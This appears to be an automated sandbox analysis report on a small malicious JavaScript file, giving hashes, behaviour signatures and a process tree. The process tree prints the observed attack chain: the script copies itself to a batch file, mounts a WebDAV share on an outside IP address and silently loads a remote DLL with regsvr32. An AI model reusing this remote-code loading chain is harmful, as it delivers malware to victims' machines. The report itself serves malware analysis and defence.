Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
10/07/2024, 01:50
General
-
Target
24869115731361117483.js
-
Size
5KB
-
MD5
2ea05a53d87cdbbce81a165df4d6527e
-
SHA1
0bcb0f1b57a721e7dab80375d82e13d30f6398d0
-
SHA256
4afbc0d3c6209011575ab90b1246921561296363630a8e99a97d7d3812f0d693
-
SHA512
3e45cbe970a1131a0b422645b1ba0003da1a7587fb279d92ba2f8c6d260378b88f6f4af72a41173f9cabf28d6629dcebedad1027a78feaccdaf9e986010b4bc9
-
SSDEEP
96:Dt8yDRPP1W3D7cXjCooYQOMFDzCJF4EnHXGpOzM3W3UhyWIyiQM9d1xWhKesCqs3:DtrDRPP1W3D7czCXYQOMFDzCJF4gHXGj
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\24869115731361117483.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\24869115731361117483.js" "C:\Users\Admin\\ldphvn.bat" && "C:\Users\Admin\\ldphvn.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\4.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD52ea05a53d87cdbbce81a165df4d6527e
SHA10bcb0f1b57a721e7dab80375d82e13d30f6398d0
SHA2564afbc0d3c6209011575ab90b1246921561296363630a8e99a97d7d3812f0d693
SHA5123e45cbe970a1131a0b422645b1ba0003da1a7587fb279d92ba2f8c6d260378b88f6f4af72a41173f9cabf28d6629dcebedad1027a78feaccdaf9e986010b4bc9